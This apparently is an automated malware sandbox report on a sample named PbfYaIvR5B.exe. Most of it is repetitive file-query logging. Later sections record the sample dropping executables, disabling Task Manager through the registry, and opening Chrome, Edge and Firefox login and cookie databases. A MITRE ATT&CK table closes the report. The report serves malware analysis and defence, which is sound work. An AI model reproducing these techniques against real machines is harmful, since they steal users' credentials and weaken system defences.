                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0005DF1E
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004B146 GetVersionExW,0_2_0004B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Lowering of HIPS / PFW / Operating System Security Settings

                                    barindex
                                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                                    Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 00000006.00000002.2026149652.0000000013385000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: MsPortSavesruntime.exe PID: 7644, type: MEMORYSTR
                                    Source: Yara matchFile source: PbfYaIvR5B.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.MsPortSavesruntime.exe.cc0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000000.1888745544.0000000000CC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1690511695.000000000744A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1689915107.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\webHostnet\MsPortSavesruntime.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, type: DROPPED
                                    Source: Yara matchFile source: PbfYaIvR5B.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.MsPortSavesruntime.exe.cc0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\webHostnet\MsPortSavesruntime.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, type: DROPPED
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 00000006.00000002.2026149652.0000000013385000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: MsPortSavesruntime.exe PID: 7644, type: MEMORYSTR
                                    Source: Yara matchFile source: PbfYaIvR5B.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.MsPortSavesruntime.exe.cc0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000000.1888745544.0000000000CC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1690511695.000000000744A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1689915107.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\webHostnet\MsPortSavesruntime.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, type: DROPPED
                                    Source: Yara matchFile source: PbfYaIvR5B.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.MsPortSavesruntime.exe.cc0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\webHostnet\MsPortSavesruntime.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts11
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    DLL Side-Loading
                                    31
                                    Disable or Modify Tools
                                    1
                                    OS Credential Dumping
                                    1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    1
                                    Web Service
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API
                                    1
                                    DLL Side-Loading
                                    11
                                    Process Injection
                                    1
                                    Deobfuscate/Decode Files or Information
                                    LSASS Memory3
                                    File and Directory Discovery
                                    Remote Desktop Protocol1
                                    Data from Local System
                                    1
                                    Ingress Tool Transfer
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Exploitation for Client Execution
                                    Logon Script (Windows)Logon Script (Windows)3
                                    Obfuscated Files or Information
                                    Security Account Manager147
                                    System Information Discovery
                                    SMB/Windows Admin Shares1
                                    Clipboard Data
                                    11
                                    Encrypted Channel
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts2
                                    Command and Scripting Interpreter
                                    Login HookLogin Hook3
                                    Software Packing
                                    NTDS231
                                    Security Software Discovery
                                    Distributed Component Object ModelInput Capture3
                                    Non-Application Layer Protocol
                                    Traffic DuplicationData Destruction
